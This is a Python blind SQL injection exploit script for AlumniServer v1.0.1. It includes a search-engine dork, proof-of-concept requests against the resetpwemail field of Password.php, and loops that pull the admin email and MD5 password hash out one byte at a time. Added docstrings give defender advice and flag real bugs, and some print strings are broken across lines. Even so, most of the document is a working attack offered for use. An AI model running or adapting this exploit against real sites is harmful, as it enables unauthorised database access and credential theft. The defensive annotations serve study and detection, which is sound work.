(POST var resetpwemail) BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->

#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var resetpwemail) BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.alumniserver.net/
#-->DOWNLOAD: http://www.alumniserver.net/
#-->DEMO: N/A
#-->CATEGORY: CMS/Education
#-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
#		and companies. Services for users include profile page, ...
#-->RELEASED: 2009-06-11
#
#CMS VULNERABILITY:
#
#-->TESTED ON: Python 2.6
#-->DORK: "AlumniServer project"
#-->CATEGORY: BSQLi PYTHON EXPLOIT
#-->AFFECT VERSION: CURRENT
#-->Discovered Bug date: 2009-06-15
#-->Reported Bug date: 2009-06-15
#-->Fixed bug date: N/A
#-->Info patch (????): N/A
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
#-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#
#------------
#CONDITIONS:
#------------
#
#magic quotes=OFF
#
#--------
#NEEDED:
#--------
#
#Valid email
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#POST http://[HOST]/[PATH]/Password.php HTTP/1.1
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=K3z7iyHttBw
#
# AUTH BYPASS --> http://www.youtube.com/watch?v=UjDm2p7qHj0
#
#
#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################
#
#Used modules
import urllib2,sys,re,os
#Defined functions
def init():
	"""Clear the console and print the tool banner.

	Output only; nothing here touches the network. The clear/title/color
	commands are chosen by sys.platform.
	"""
	#NOTE(review): win32 is referenced as a bare name here rather than a
	#string literal, so this comparison does not test for the "win32" platform
	#string; evaluating it raises NameError on any platform.
	if(sys.platform==win32):
		os.system("cls")
		os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
		os.system ("color 02")
	else:
		os.system("clear")

	#Banner; the string literals below span several physical lines.
	print "	#######################################################

"
	print "	#######################################################

"
	print "	##     AlumniServer v-1.0.1 Blind SQLi Exploit       ##

"
	print "	##       ++Conditions: magic_quotes=OFF              ##

"
	print "	##       ++Needed: Valid mail                        ##

"
	print "	##               Author: Y3nh4ck3r                   ##

"
	print "	##      Contact:y3nh4ck3r[at]gmail[dot]com           ##

"
	print "	##            Proud to be Spanish!                   ##

"
	print "	#######################################################

"
	print "	#######################################################

"
	
def request(urltarget,postmsg):
	"""POST postmsg as the raw request body to urltarget and return the response body.

	urltarget: full URL of the form handler (Password.php in this tool).
	postmsg: pre-encoded application/x-www-form-urlencoded body; it is sent
	as-is, nothing is escaped here.
	Returns the response body as a str. No timeout is set and no exception
	is caught: a urllib2.URLError/HTTPError propagates and aborts the run.

	Defender note: every probe this tool sends is a POST to Password.php whose
	resetpwemail value is an address followed by injected SQL tokens
	(%27, +AND+, SELECT, substring, ascii). Request-body logging on that
	endpoint, or rules keyed on those tokens inside the resetpwemail field,
	expose this traffic; the per-character loops that call this function
	also generate hundreds of near-identical requests from one client.
	"""
	req=urllib2.Request(url=urltarget,data=postmsg)
	conn = urllib2.urlopen(req)
	outcode=conn.read()
	#print outcode #--> Active this line for debugger mode
	return outcode

def error():
	"""Print the 'not vulnerable' diagnostics and terminate the process.

	Called when the true/false baseline probes return identical bodies, and
	from brute_length when no candidate length up to 50 matches. Never
	returns: ends with sys.exit().
	"""
	print "	------------------------------------------------------------
"
	print "	Web isnt vulnerable!

"
	print "	--->Maybe:

"
	print "		1.-Patched.
"
	print "		2.-Bad path or host.
"
	print "		3.-Bad mail.
"
	print "		4.-Magic quotes ON.
"
	print "		EXPLOIT FAILED!
"
	print "	------------------------------------------------------------
"
	sys.exit()

def testedblindsql():
	"""Print the 'maybe vulnerable' status lines; output only, returns None."""
	print "	-----------------------------------------------------------------
"
	print "	WEB MAYBE BE VULNERABLE!

"
	print "	Tested Blind SQL Injection.
"		
	print "	Starting exploit...
"
	print "	-----------------------------------------------------------------

"

def helper(filename):
	"""Print the usage text (with filename as the script name) and exit.

	filename: the invoked script path (sys.argv[0] from the caller).
	Never returns: ends with sys.exit().
	"""
	print "
	[!!!] AlumniServer v-1.0.1 Blind SQL Injection Exploit
"
	print "	[!!!] USAGE MODE: [!!!]
"
	print "	[!!!] python "+filename+" [HOST] [PATH] [MAIL] [ID_ADMIN/HIDDEN/BRUTEFORCEID]
"
	print "	[!!!] [HOST]: Web.
"
	print "	[!!!] [PATH]: Home Path.
"
	print "	[!!!] [MAIL]: Mail for fish
"
	print "	[!!!] [ID_ADMIN/HIDDEN/BRUTEFORCEID]: Id_admin if we are registered users or hidden value if admin is hidden.
"
	print "	[!!!]  Also can use bruteforceid value for bruteforce admin id previously.
"
	print "	[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com cd54cd7df99a
"
	print "	[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com hidden
"
	print "	[!!!] Example: python "+filename+" www.example.com demo y3nh4ck3r@gmail.com bruteforceid
"
	sys.exit()
	
def brute_length(urlrequest, idadmin, mail):
	"""Find the length of the targeted row's email column, one probe per candidate length.

	urlrequest: full Password.php URL.
	idadmin: user id string interpolated into the query, or the literal
	"hidden" to select the hideuser variant instead.
	mail: a valid account address; the request only succeeds when the
	injected condition is true, which is the oracle.
	Returns the first i in 1..50 whose probe response contains the reset
	success message. Once i exceeds 50 error() is called, which exits.

	Defender note: the oracle is the application's own success text. Binding
	resetpwemail as a query parameter, and returning the same generic
	response whether or not the address matched, removes this side channel;
	a burst of POSTs to Password.php with a growing "=1", "=2", ... suffix
	from one client is the detection signature of this loop.
	"""
	#Username length
	flag=1
	i=0
	while(flag==1):
		i=i+1
		if(idadmin=="hidden"):
			blindsql="resetpwemail="+mail+"+AND+(SELECT+length(email)+FROM+as_users+WHERE+hideuser=y)="+str(i) #injected code
		else:
			blindsql="resetpwemail="+mail+"+AND+(SELECT+length(email)+FROM+as_users+WHERE+id="+idadmin+")="+str(i) #injected code
		output=request(urlrequest, blindsql)
		#A body containing the success message means the injected equality held.
		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
			flag=2
		else:
			flag=1
		#This is the max length of email
		#Checked after the request, so probe 51 is still sent before giving up.
		if (i>50):
			error()
		#Save column length
	length=i
	print "	<<<<<--------------------------------------------------------->>>>>
"
	print "	Length catched!
"
	print "	Length E-mail --> "+str(length)+"
"
	print "	Wait several minutes...
"
	print "	<<<<<--------------------------------------------------------->>>>>

"
	return length
def exploiting (lengthvalue, urlrequest, column, idadmin, mail):
	"""Recover up to lengthvalue characters of `column` for the targeted as_users row, one byte at a time.

	lengthvalue: number of positions to read (the caller passes the email
	length from brute_length, or 32 for the password column).
	urlrequest: full Password.php URL.
	column: column name interpolated verbatim into the query ("email" or
	"password" from the caller).
	idadmin: user id string, or "hidden" for the hideuser variant.
	mail: valid account address used as the oracle.
	Returns the recovered characters as a str. For each position k the
	candidate byte z walks 32..126; a match appends chr(z). The while
	condition also ends the loop when z passes 126 without a match, so the
	result may be shorter than lengthvalue and no error is raised for that.
	Worst case this is ~95 requests per character.
	"""
	#Bruteforcing values
	values=""
	k=1
	z=32
	while((k<=lengthvalue) and (z<=126)):
		#Choose method, hidden or with id
		if(idadmin=="hidden"):
			blindsql="resetpwemail="+mail+"+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+hideuser=y),"+str(k)+",1))="+str(z) #injected code
		else:
			blindsql="resetpwemail="+mail+"+AND+ascii(substring((SELECT+"+column+"+FROM+as_users+WHERE+id="+idadmin+"),"+str(k)+",1))="+str(z) #injected code
		output=request(urlrequest, blindsql)
		if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
			values=values+chr(z)
			k=k+1
			#z is reset here, but the increment below still runs in the same
			#pass, so the next position starts its walk at 33.
			z=32
#new char
		z=z+1 
	return values
	
def exploiting_id (urlrequest, mail):
	"""Brute-force, position by position (max 12), the id selected by the HAVING MIN(membersince) subquery.

	urlrequest: full Password.php URL.
	mail: valid account address used as the oracle.
	Returns the recovered id characters as a str.
	NOTE(review): arrayids lists a..f as bare names rather than string
	literals, and `z=g` rebinds the loop variable to another unbound name;
	assigning the loop variable inside a for loop does not change the
	iteration, and an unbound name raises NameError when evaluated. The
	inner for loop is never broken out of, and if no candidate matches at
	position k the outer while never advances, so the request count is
	unbounded in that case.
	"""
	#Bruteforcing values
	values=""
	#Possible values of id
	arrayids=[0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f]
	k=1
	#Max length of id = 12
	while(k<=12):
		for z in arrayids:	
			blindsql="resetpwemail="+mail+"+AND+substring((SELECT+id+FROM+as_users+HAVING+MIN(membersince)),"+str(k)+",1)="+str(z) #injected code
			output=request(urlrequest, blindsql)
			if(re.search("You will receive an email shortly with a link that enables you to reset your password.",output)):
				values=values+str(z)
				k=k+1
				z=g		
	return values
#Main
init()
#Init variables
#Expected argv: script HOST PATH MAIL MODE; with fewer than five entries the
#usage text is printed and the process exits.
if(len(sys.argv) <= 4):
    helper(sys.argv[0])

host=sys.argv[1]
path=sys.argv[2]
mail=sys.argv[3]
#Define mode: ID, hidden or bruteforceid
#idadmin is only bound in the "usual" branch; the other modes do not use it
#before it is assigned again below.
if(sys.argv[4]=="hidden"):
	mode="hidden"
elif(sys.argv[4]=="bruteforceid"):
	mode="bruteforceid"
else:
	mode="usual"
	idadmin=sys.argv[4]

#Target is always Password.php under the given host/path, plain http.
finalrequest="http://"+host+"/"+path+"/Password.php"
#Baseline pair: one probe whose injected condition is true and one whose
#condition is false. The tool only proceeds if the two response bodies
#differ. Defender note: a Password.php that binds resetpwemail as a query
#parameter and answers with one constant, generic message defeats this
#check and every extraction loop that follows; the pair of POSTs carrying
#%27+and+1%3D%271 / %270 is the first thing to look for in access logs.
testblind1="resetpwemail="+mail+"%27+and+1%3D%271" #Return true
outcode1=request(finalrequest,testblind1)
testblind2="resetpwemail="+mail+"%27+and+1%3D%270" #Return false
outcode2=request(finalrequest,testblind2)
#Check BSQLi
if(outcode1==outcode2):
	error()
else:
	testedblindsql()
if(mode=="usual"):
	#Catching length of admin email
	lengthadmin=brute_length(finalrequest, idadmin, mail)
	mailadmin=exploiting(lengthadmin, finalrequest, "email", idadmin, mail)
	#Catching value of password (hashed md5)
	#32 is the fixed length passed for the password column.
	passwordhash=exploiting(32, finalrequest, "password", idadmin, mail)
elif(mode=="hidden"):
	#Catching length of admin email
	lengthadmin=brute_length(finalrequest, "hidden", mail)
	mailadmin=exploiting(lengthadmin, finalrequest, "email", "hidden", mail)
	#Catching value of password (hashed md5)
	passwordhash=exploiting(32, finalrequest, "password", "hidden", mail)
else:
	print "	<<<<<--------------------------------------------------------->>>>>
"
	print "	Bruteforcing id. Wait a few minutes...
"
	print "	<<<<<--------------------------------------------------------->>>>>

"
	#Catching value of admin id
	idadmin=exploiting_id(finalrequest, mail)

#Result report; the exploiting loops return whatever was recovered, so these
#values may be partial (see exploiting).
print "
		*************************************************
"
print "		*********  EXPLOIT EXECUTED SUCCESSFULLY ********
"
print "		*************************************************

"
#Mode usual and hidden
if((mode=="usual") or (mode=="hidden")):
	print "		Admin-mail: "+mailadmin+"

"
	print "		Password hash: "+passwordhash+"

"
else:
#Mode bruteforceid
    print "		Admin-id: "+idadmin+"

"
print "
		<<----------------------FINISH!-------------------->>

"
print "		<<---------------Thanks to: y3nh4ck3r-------------->>

"
print "		<<------------------------EOF---------------------->>

"